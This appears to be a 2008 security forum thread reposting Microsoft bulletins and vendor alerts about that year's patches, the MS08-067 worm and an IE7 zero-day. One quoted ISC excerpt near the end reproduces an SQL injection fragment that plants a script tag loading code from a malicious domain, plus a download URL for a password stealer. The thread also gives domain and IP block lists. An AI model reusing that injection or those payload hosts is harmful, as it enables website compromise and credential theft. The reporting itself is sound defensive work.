• V1.6 (August 12, 2008): Added entry to the Frequently Asked Questions (FAQ) Related to this Security Update to communicate a change in the installation code for the security update for SQL Server 2005 Service Pack 2. This is an installation code change only. There were no changes to the security update binaries.

//

FYI...

Microsoft Security Advisory (953839)
Cumulative Security Update of -ActiveX- Kill Bits
- http://www.microsoft.com/technet/security/advisory/953839.mspx
August 12, 2008 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory. The update includes kill bits for the following third-party software:
• Aurigma Image Uploader. Aurigma has issued an advisory and an update that addresses vulnerabilities...
http://blogs.aurigma.com/post/2008/03/Official-security-bulletin.aspx ...
• HP Instant Support. HP has issued an advisory and an update that addresses vulnerabilities. Please see the advisory from HP for more information...
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264 ...
...Customers who are interested in learning more about this update should review Microsoft Knowledge Base Article 953839
- http://support.microsoft.com/kb/953839
August 12, 2008

- http://www.microsoft.com/technet/security/advisory/953839.mspx
• August 13, 2008: Updated to include links to HP’s Advisories
"...HP has issued -2- advisories..."
* http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264
** http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01439758

:fear:

FYI...

MS08-051 V2.0 Patch issued August 20, 2008
- http://isc.sans.org/diary.html?storyid=4918
Last Updated: 2008-08-22 00:30:51 UTC - "Microsoft has posted new update packages, labeled Version 2, for Microsoft Office PowerPoint 2003 Service Pack 2 and Microsoft Office PowerPoint 2003 Service Pack 3" described in MS08-051*, Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution... Others should check with their patch management vendors. The original patch "contained incorrect versions of the binaries. While these versions did protect against the vulnerabilities discussed in the bulletin, they lacked other important security and reliability updates..."

* http://www.microsoft.com/technet/security/bulletin/ms08-051.mspx
• V2.0 (August 20, 2008): ...Customers who manually installed Version 1 of this update from Microsoft Download Center need to reinstall Version 2 of this update. Customers who have installed this update using Microsoft Update or Office Update do not need to reinstall..."

:fear:

FYI...

Gotcha: IE8 Lock-In With XP SP3
- http://www.wservernews.com/?id=690
Sep 1, 2008 - "...Redmond on its IE blog* warned XP SP3 users that in some circumstances they will not be able to uninstall either SP3 or IE8. This heads-up was similar to an earlier warning in May, when XP SP3 had just been released. Redmond said then that you wouldn't be able to downgrade from IE7 to the older IE6 browser without uninstalling SP3. Jane Maliouta, an IE program manager, gave specifics about this new gotcha, which impacts you when you downloaded and installed IE8 Beta 1 prior to updating XP to SP3. If you then upgrade IE8 to Beta 2, which Redmond unveiled on the 28th, you will be stuck with both IE8 and Windows XP SP3. You will get a warning dialog:
"If you continue, XP SP3 and IE8 Beta 2 will become permanent, you will still be able to upgrade to later IE8 builds as they become available, but you won't be able to uninstall them."
So how to get around this lock-in? First uninstall XP SP3, then uninstall IE8 Beta 1; then reinstall XP SP3 and follow that by installing IE8 Beta 2. Dang, that's a hassle..."
* http://blogs.msdn.com/ie/archive/2008/08/27/upgrading-to-internet-explorer-8-beta-2.aspx

:thud: :fear:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-sep.mspx
September 9, 2008 - "The security bulletins for this month are as follows, in order of severity: (Total of -4-)

Critical (4)

Microsoft Security Bulletin MS08-054
Vulnerability in Windows Media Player Could Allow Remote Code Execution (954154)
- http://www.microsoft.com/technet/security/Bulletin/ms08-054.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-052
Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)
- http://www.microsoft.com/technet/security/Bulletin/ms08-052.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer, .NET Framework, Office, SQL Server, Visual Studio...

Microsoft Security Bulletin MS08-053
Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution (954156)
- http://www.microsoft.com/technet/security/Bulletin/ms08-053.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-055
Vulnerability in Microsoft Office Could Allow Remote Code Execution (955047)
- http://www.microsoft.com/technet/security/Bulletin/ms08-055.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---
ISC Analysis:
- http://isc.sans.org/diary.html?storyid=5009
Last Updated: 2008-09-09 17:46:41 UTC

- http://blogs.technet.com/swi/
Sep. 9, 2008

---
MS08-052
- http://secunia.com/advisories/31675/

MS08-053
- http://secunia.com/advisories/31724/

MS08-054
- http://secunia.com/advisories/31726/

MS08-055
- http://secunia.com/advisories/31744/

---
Revisions...

MS08-052:
- http://www.microsoft.com/technet/security/Bulletin/ms08-052.mspx
• V2.0 (September 12, 2008): Bulletin updated to add Microsoft Office Project 2002 Service Pack 2, all Office Viewer software for Microsoft Office 2003, and all Office Viewer software for 2007 Microsoft Office System as Affected Software...

MS08-053:
- http://www.microsoft.com/technet/security/Bulletin/ms08-053.mspx
• V1.1 (September 10, 2008): Corrected the "Installing without user intervention" and "Installing without restarting" switches in the Security Update Deployment sections for Windows Vista and Windows Server 2008. Also changed "C:\Program Files" to "%programfiles%" in the Workarounds for Windows Media Encoder Buffer Overrun Vulnerability - CVE-2008-3008 commands.

MS08-054:
- http://www.microsoft.com/technet/security/Bulletin/ms08-054.mspx
• V1.1 (September 10, 2008): Removed erroneous entry from Mitigating Factors for Windows Media Player Sampling Rate Vulnerability - CVE-2008-2253.

MS08-055:
- http://www.microsoft.com/technet/security/Bulletin/ms08-055.mspx
• V1.1 (September 10, 2008): Corrected the installation switches and deployment information for OneNote 2007, and added to the list of non-affected software. Also, updated FAQ entries explaining why this update is offered to systems with non-affected software.

:-(

FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
Sep. 19, 2008 - "The ThreatCon is currently at Level 1. Symantec is currently monitoring in-the-wild attacks leveraging the recently patched Windows Media Player ActiveX vulnerability associated with MS08-053. On September 15, 2008, the DeepSight honeynet observed active exploitation of this flaw as part of a web exploit kit. Successful exploitation of this, or any of the other targeted vulnerabilities, will install malicious code on victim computers. For details on the vulnerability, see the following: Microsoft Windows Media Encoder 9 'wmex.dll' ActiveX Control Remote Buffer Overflow Vulnerability ( http://www.securityfocus.com/bid/31065 ) We strongly urge all users to apply the patches made available in the MS08-053 security bulletin immediately. Those who cannot do so should set the kill bit on the associated CLSID (A8D3AD02-7508-4004-B2E9-AD33F087F43C) until patches can be applied. For more information and patches, see the Microsoft bulletin: Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution ( http://www.microsoft.com/technet/security/bulletin/MS08-053.mspx ) ."

:fear:

FYI...

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
Published: April 17, 2008 | Updated: October 9, 2008
"Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2, Windows XP Professional Service Pack 3, and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability.
Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect customers who have applied the workarounds listed...
Revisions:
• April 17, 2008: Advisory published
• April 23, 2008: Added clarification to impact of workaround for IIS 6.0
• August 27, 2008: Added Windows XP Professional Service Pack 3 as affected software.
• October 9, 2008: Added information regarding the public availability of exploit code...

:fear:

FYI...

MS e-mail spoofs with malware
- http://blogs.technet.com/msrc/archive/2008/10/13/microsoft-security-e-mail-spoofs-with-malware.aspx
October 13, 2008 - "... While malicious e-mails posing as Microsoft security notifications with attached malware aren’t new (we’ve seen this problem for several years) this particular one is a bit different in that it claims to be signed by our own Steve Lipner and has what appears to be a PGP signature block attached to it. While those are clever attempts to increase the credibility of the mail, I can tell you categorically that this is -not- a legitimate e-mail: it is a piece of malicious spam and the attachment is malware. Specifically, it contains Backdoor:Win32/Haxdoor... we never, ever, ever send attachments with our security notification e-mails. And, as a matter of company policy, Microsoft will never send you an executable attachment. If you get an e-mail that claims to be a security notification with an attachment, delete it. It is always a spoof..."

:fear::fear:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-oct.mspx
October 14, 2008
"This bulletin summary lists security bulletins released for October 2008...

Critical (4)

Microsoft Security Bulletin MS08-060
Vulnerability in Active Directory Could Allow Remote Code Execution (957280)
- http://www.microsoft.com/technet/security/Bulletin/MS08-060.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-058
Cumulative Security Update for Internet Explorer (956390)
- http://www.microsoft.com/technet/security/Bulletin/MS08-058.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-059
Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695)
- http://www.microsoft.com/technet/security/Bulletin/MS08-059.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Host Integration Server...

Microsoft Security Bulletin MS08-057
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416)
- http://www.microsoft.com/technet/security/Bulletin/MS08-057.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (6)

Microsoft Security Bulletin MS08-066
Vulnerability in the Microsoft Ancillary Function Driver Could Allow Elevation of Privilege (956803)
- http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-061
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211)
- http://www.microsoft.com/technet/security/Bulletin/MS08-061.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-062
Vulnerability in Windows Internet Printing Service Could Allow Remote Code Execution (953155)
- http://www.microsoft.com/technet/security/Bulletin/MS08-062.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-063
Vulnerability in SMB Could Allow Remote Code Execution (957095)
- http://www.microsoft.com/technet/security/Bulletin/MS08-063.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-064
Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841)
- http://www.microsoft.com/technet/security/Bulletin/MS08-064.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-065
Vulnerability in Message Queuing Could Allow Remote Code Execution (951071)
- http://www.microsoft.com/technet/security/Bulletin/MS08-065.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Microsoft Windows...

Moderate (1)

Microsoft Security Bulletin MS08-056
Vulnerability in Microsoft Office Could Allow Information Disclosure (957699)
- http://www.microsoft.com/technet/security/Bulletin/MS08-056.mspx
Maximum Severity Rating: Moderate
Impact of Vulnerability: Information Disclosure
Affected Software: Microsoft Office...

---

ISC Anaylsis
- http://isc.sans.org/diary.html?storyid=5180
Last Updated: 2008-10-14 18:30:09 UTC

FYI...

Microsoft Security Advisory (956391)
Cumulative Security Update of ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/956391.mspx
October 14, 2008 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory...
This update sets the kill bits for the following third-party software:
• Microgaming Download Helper...
• System Requirements Lab...
• PhotoStockPlus Uploader Tool...
This update sets the kill bits for ActiveX controls addressed in previous Microsoft Security Bulletins. These kill bits are being set in this update as a defense in depth measure:
• Unsafe Functions in Office Web Components (328130), MS02-044.
• Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (933103), MS08-017.
• Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617), MS08-041.
• Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593), MS08-052.
For more information about installing this update, see Microsoft Knowledge Base Article 956391*."
* http://support.microsoft.com/kb/956391
Last Review: October 14, 2008

:spider:

FYI...

Microsoft Security Bulletin MS08-067
Vulnerability in Server Service Could Allow Remote Code Execution (958644)
- http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx
October 23, 2008 - "...This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit..."
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...
Exploitability Index: 1 - Consistent exploit code likely...

- http://blogs.technet.com/msrc/archive/2008/10/23/ms08-067-released.aspx
October 23, 2008
- http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx

---
MS08-067 - exploit in the wild
- http://www.symantec.com/security_response/threatconlearn.jsp
Oct. 23, 2008 - "The ThreatCon is currently at Level 2: Elevated. The DeepSight Threat Analysis Team has updated the ThreatCon to Level 2. Microsoft has released an out-of-band security bulletin to address a Critical flaw in the Server Service (SVRSVC). The vulnerability occurs because of a failure in processing malformed RPC packets sent to the service. By default this issue can be exploited without authentication on Windows 2000, Windows XP, and Windows 2003. Both Windows Vista and Windows Server 2008 are vulnerable, but require authentication by default.
MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
According to the bulletin this vulnerability is being actively exploited in the wild..."
---

- http://securitylabs.websense.com/content/Alerts/3218.aspx
10.23.2008

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
10.23.2008

- http://secunia.com/advisories/32326
Release Date: 2008-10-23
Critical: Highly critical
Impact: System access...

- http://isc.sans.org/diary.html?storyid=5227
Last Updated: 2008-10-23 20:58:46 UTC ...Version: 3
"...we believe that client computers need to be updated with all due haste..."

:fear:

FYI...

Microsoft Security Advisory (958963)
Exploit Code Published Affecting the Server Service
- http://www.microsoft.com/technet/security/advisory/958963.mspx
October 27, 2008 - "Microsoft is aware that detailed exploit code demonstrating code execution has been published on the Internet for the vulnerability that is addressed by security update MS08-067*. This exploit code demonstrates code execution on Windows 2000, Windows XP, and Windows Server 2003. Microsoft is aware of limited, targeted active attacks that use this exploit code. At this time, there are no self-replicating attacks associated with this vulnerability. Microsoft has activated its Software Security Incident Response Process (SSIRP) and is continuing to investigate this issue. Our investigation of this exploit code has verified that it does not affect customers who have installed the updates detailed in MS08-067 on their computers. Microsoft continues to recommend that customers apply the updates to the affected products by enabling the Automatic Updates feature in Windows..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

:fear:

FYI...

Vista updates KB957200 and KB953155
- http://isc.sans.org/diary.html?storyid=5258
Last Updated: 2008-10-30 14:02:45 UTC - "...A few readers are writing in to ask about two recent updates appearing in their queue: KB957200 and KB953155.

KB957200* is listed as a reliability update and according to Microsoft: "this update resolves some performance and reliability issues in Windows Vista. By applying this update, you can achieve better performance and responsiveness in various scenarios. After you install this item, you may have to restart your computer."
* http://support.microsoft.com/kb/957200/en-us

KB953155** is a security update related to MS08-062..."
** http://support.microsoft.com/kb/953155/en-us
Last Review: October 14, 2008
- http://www.microsoft.com/technet/security/bulletin/ms08-062.mspx
Updated: October 29, 2008
Version: 2.2...
"...There were no changes to the security update binaries..."

:fear:

FYI...

- http://www.f-secure.com/weblog/archives/00001525.html
October 31, 2008 - " We are seeing the first Proof of Concept binaries that target the MS08-067 vulnerability on the following English localized systems:
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows 2003 Service Pack 2
The payload is encrypted as normal. It's function is to add the guest account to the administrators group, thus allowing unlimited access to the machine. We detect the binaries as follows:
Backdoor:W32/Agent.DIN
Backdoor:W32/Agent.DIO
Backdoor:W32/Agent.DIP
We'll continue to keep an eye on the events."

:fear: :fear:

FYI...

Worm Exploiting MS08-067 in the Wild
- http://www.f-secure.com/weblog/archives/00001526.html
November 3, 2008 - "Code building on the proof of concept binaries that were mentioned last week has moved into the wild. We've received the first reports of a worm capable of exploiting the MS08-067 vulnerability. The exploit payload downloads a dropper that we detect as Trojan-Dropper.Win32.Agent.yhi. The dropped components include a kernel mode DDOS-bot that currently has a selection of Chinese targets in its configuration. The worm component is detected as Exploit.Win32.MS08-067.g and the kernel component as Rootkit.Win32.KernelBot.dg."

Also see: http://isc.sans.org/diary.html?storyid=5275
Last Updated: 2008-11-03 18:54:56 UTC ...(Version: 3)

:fear:

FYI...

- http://www.theregister.co.uk/2008/11/03/microsoft_intelligence_report/
3 November 2008 - "Malware and unwanted software made strides in the first half of 2008, according to the latest security intelligence report from Microsoft, which tallied a 43 percent increase in the number of programs exorcised by the the company's malicious software removal tool. In the first six months of this year, there were some 62 million disinfections on 23.8 million machines, according to the report which was published* Monday. In the second half of last year, 42 million programs were removed on 15 million computers. Because it runs on hundreds of millions of machines worldwide, Microsoft's MSRT, or malicious software removal tool, functions as something of a bellwether for the state of successful attacks affecting Windows computers. The increase was driven in part by the addition of new strains of malware that the MSRT checks for, said Jeff Williams, principal architect for the Microsoft Malware Protection Center. Win32/Taterf, a family of worms that steals login credentials for a host of online games, was one such addition and was removed 2.7 million times. Other causes included the growing aggressiveness of established malware families. Win32/Zlob, a trojan that has bedeviled Windows users for years, was removed 7.5 million times..."
* http://www.microsoft.com/sir

:fear:

More detail...

- http://asert.arbornetworks.com/2008/11/ms08-067-used-to-drop-ddos-bots/
November 3, 2008 - "...The exploit code is 67.exe, and the bot itself is 6767.exe. KernelBot is a Chinese origin DDoS bot... We first became aware of this bot during the CNN.Com attacks earlier this year... If you want to stop this one, you should block all web access to the domain ushealthmart .com. It’s using a few hosts under that domain name to spread and send out configurations... KernelBot can send ICMP, TCP SYN, UDP, and even HTTP flood attacks, among others. It communicates with a server to retrieve the file, usually named “cmd.txt”, which itself is a large INI file describing attacks and next actions..."

- http://isc.sans.org/diary.html?storyid=5288
Last Updated: 2008-11-05 02:53:31 UTC - "...exploiting ip 61.218.147.66. That IP is definitely sequentially scanning ip addresses for tcp 445 looking for vulnerable systems so blocking it at your enterprise gateway is recommended."

:fear:

FYI...

Hacker tool targeting MS08-067 vuln
- http://securitylabs.websense.com/content/Blogs/3237.aspx
11.11.2008 - "Websense... has noticed a special hacker tool in China. In the past few weeks, Microsoft has announced and released a patch for the MS08-067 vulnerability, and a hacker tool named "wolfteeth bot catcher" has been widely used by hackers to attack machines running Windows operating systems -without- the KB958644 patch... First, the tool drops and runs a backdoor named bycnboy.exe, which moves itself to the system folder and is renamed to windef.exe. This means that hackers who used this tool were themselves hacked by the tool's author. Then a file named project.exe is placed in the temp folder and loaded to run once the original file has finished its job... a Trojan file from the user-defined Web site could be downloaded and executed. All the vulnerable IPs are controlled remotely..."

(Screenshots and more detail available at the URL above.)

:fear:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 11, 2008 - "This bulletin summary lists security bulletins released for November 2008... (Total of -2-)

Critical (1)

Microsoft Security Bulletin MS08-069
Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (1)

Microsoft Security Bulletin MS08-068
Vulnerability in SMB Could Allow Remote Code Execution (957097)
- http://www.microsoft.com/technet/security/bulletin/ms08-068.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5330
Last Updated: 2008-11-11 18:28:39 UTC

FYI...

- http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx
November 25, 2008 5:37 PM - "As expected, we are seeing another wave of attacks exploiting the vulnerability detailed in security bulletin MS08-067. Early last week... the number of exploits in the wild was still low and they were mostly targeted attacks. However, during the weekend we started receiving customer reports for new malware that exploits this vulnerability. During the last two days that malware gained momentum and as a result we see an increased support call volume... This malware mostly spreads within corporations but also was reported by several hundred home users. It opens a random port between port 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once the remote computer is exploited, that computer will download a copy of the worm via HTTP using the random port opened by the worm. The worm often uses a .JPG extension when copied over and then it is saved to the local system folder as a random named dll. It is also interesting to note that the worm patches the vulnerable API in memory so the machine will not be vulnerable anymore... We have also found several bots that exploit MS08-067... We continue to urge all our customers to install MS08-067*..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
CVSS v2 Base Score: 10.0 (HIGH)...
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service...
- http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A
"...Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately..."

:fear::fear:

FYI...

- http://blog.trendmicro.com/downad-gearing-up-for-a-botnet/
Nov. 30, 2008 - "A few days ago, Trend Micro got wind of a .DLL worm detected as WORM_DOWNAD.A that exploits the MS08-067 vulnerability. Its routines have lead our security analysts to postulate that it is a key component in the development of a new botnet. Initially thought to be working in conjunction with a NETWORM variant, WORM_DOWNAD.A is now believed to be an updated version of an attack from the same criminal botnet gang. Fresh reports, however, suggest that this threat seems to have gone wider and has even extended its reach around the globe. More than 500,000 unique hosts have since been discovered to have fallen victim to this threat. These infected hosts are spread across different countries and as a random check by Trend Micro... revealed, they can be found in service provider networks in the U.S., China, India, the Middle East, Europe, and Latin America — several residential broadband providers appear to have a larger number of infected customers..."

:fear::mad::fear:

FYI...

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 - "Microsoft is investigating new reports of a vulnerability in the WordPad Text Converter for Word 97 files on Windows 2000 Service Pack 4, Windows XP Service Pack 2, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2. Windows XP Service Pack 3, Windows Vista, and Windows Server 2008 are -not- affected as these operating systems do not contain the vulnerable code. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability..."

- http://isc.sans.org/diary.html?storyid=5461
Last Updated: 2008-12-10 11:38:37 UTC

- http://blog.trendmicro.com/a-wordpad-of-caution/
Dec. 15, 2008 - "...The exploit works by using a specially-crafted .DOC, .WRI, or .RTF file to take advantage of the WordPad vulnerability, thereby causing the said application to crash. This crash may then allow a remote malicious user to take control of an affected system..."

- http://www.microsoft.com/technet/security/advisory/960906.mspx
• December 15, 2008: Updated the workaround, Disable the WordPad Text Converter for Word 97.

:fear:

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
Published: December 9, 2008 - "This bulletin summary lists security bulletins released for December 2008... security bulletins for this month in order of severity... ( Total of - 8 - )

Critical (6)

Microsoft Security Bulletin MS08-071
Vulnerabilities in GDI Could Allow Remote Code Execution (956802)
- http://www.microsoft.com/technet/security/Bulletin/ms08-071.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-075
Vulnerabilities in Windows Search Could Allow Remote Code Execution (959349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-075.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-073
Cumulative Security Update for Internet Explorer (958215)
- http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-070
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Severity Rating: Critical
Affected Software: Microsoft Developer Tools and Software, Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-072
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173)
- http://www.microsoft.com/technet/security/bulletin/ms08-072.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-074
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070)
- http://www.microsoft.com/technet/security/bulletin/ms08-074.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Important (2)

Microsoft Security Bulletin MS08-077
Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175)
- http://www.microsoft.com/technet/security/bulletin/ms08-077.mspx
Severity Rating: Important
Affected Software: Microsoft Office, Microsoft Server Software...
Vulnerability Impact: Elevation of Privilege...

Microsoft Security Bulletin MS08-076
Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807)
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
Severity Rating: Important
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...
_____

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5449
Last Updated: 2008-12-09 20:36:04 UTC
_____

- http://preview.tinyurl.com/5oqpcj
December 9, 2008 (Computerworld) - "(MS)... patched 28 vulnerabilities... the biggest batch of fixes it has issued since it switched to a regular monthly update schedule more than five years ago. Of the 28 bugs quashed today, Microsoft ranked 23 of them critical..."

:fear:

FYI...

IE XML processing memory corruption
- http://secunia.com/advisories/33089/
Release Date: 2008-12-10
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Explorer 7.x...
...Successful exploitation allows execution of arbitrary code.
NOTE: Reportedly, the vulnerability is currently being actively exploited.
The vulnerability is confirmed in Internet Explorer 7 on a fully patched Windows XP SP3. Other versions may also be affected.
Solution: Do not browse untrusted websites or follow untrusted links.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-10 09:38:03 UTC

- https://forums.symantec.com/syment/blog/article?blog.id=vulnerabilities_exploits&message.id=180#M180
12-10-2008 - "...We also recommend blocking the following hosts at network boundaries:
• wwwwyyyyy.cn
• sllwrnm5.cn
• baikec.cn
• oiuytr.net *
• laoyang4.cn
• cc4y7.cn ..."

* example: https://safeweb.norton.com/report/show?name=oiuytr.net

:fear::fear:

FYI...

- http://securitylabs.websense.com/content/Alerts/3259.aspx
12.10.2008 - "...No user interaction is necessary for the exploit to be successful. A computer may become infected by simply visiting a malicious Web site. This vulnerability exists in the way XML is processed within Internet Explorer 7..."

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...Update: Microsoft published a bulletin regarding this issue*... In addition, shadowserver.org published a list of infected sites**. Note that this list may not be complete. The best mitigating action from the bulletin is probably to enable DEP for Internet Explorer 7...

* http://www.microsoft.com/technet/security/advisory/961051.mspx
December 10, 2008 - "...Suggested Actions... Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors...
• Set Internet and Local intranet security zone settings to "High" to prompt before running ActiveX Controls and Active Scripting in these zones...
• Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone...
• Enable DEP for Internet 7...

IE7 0-Day Exploit Sites
** http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
10 December 2008 - "...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not stop completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."

> http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...UPDATE 2: ...we received log files showing that attackers using SQL injection are now. The SQL Injection attacks are similar to those we've described multiple times before (see http://isc.sans.org/diary.html?storyid=4565 , for example). The important part includes the target URL that is injected:
… rtrim(convert(varchar(4000),['+@C+']))+''<script src=http ://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM …
This domain is not listed by Shadowserver yet. The 1.js script on the domain links to multiple other HTML documents of which one is called ie7.htm ... If executed successfully, the script will download the binary from http ://www [dot] steoo [dot] com/admin/win.exe. This is a game password stealer which has sporadic detection ( http://www.virustotal.com/analisis/244ae03fed5b32d999c50b614fddde6a ) – there are some big names still missing it. In any case, the attackers are picking this quickly so make sure that you are following recommendations from Microsoft's advisory which will help reduce exposure or, if you can, use an alternative browser until this has been fixed."

_____

- http://securitylabs.websense.com/content/Alerts/3260.aspx
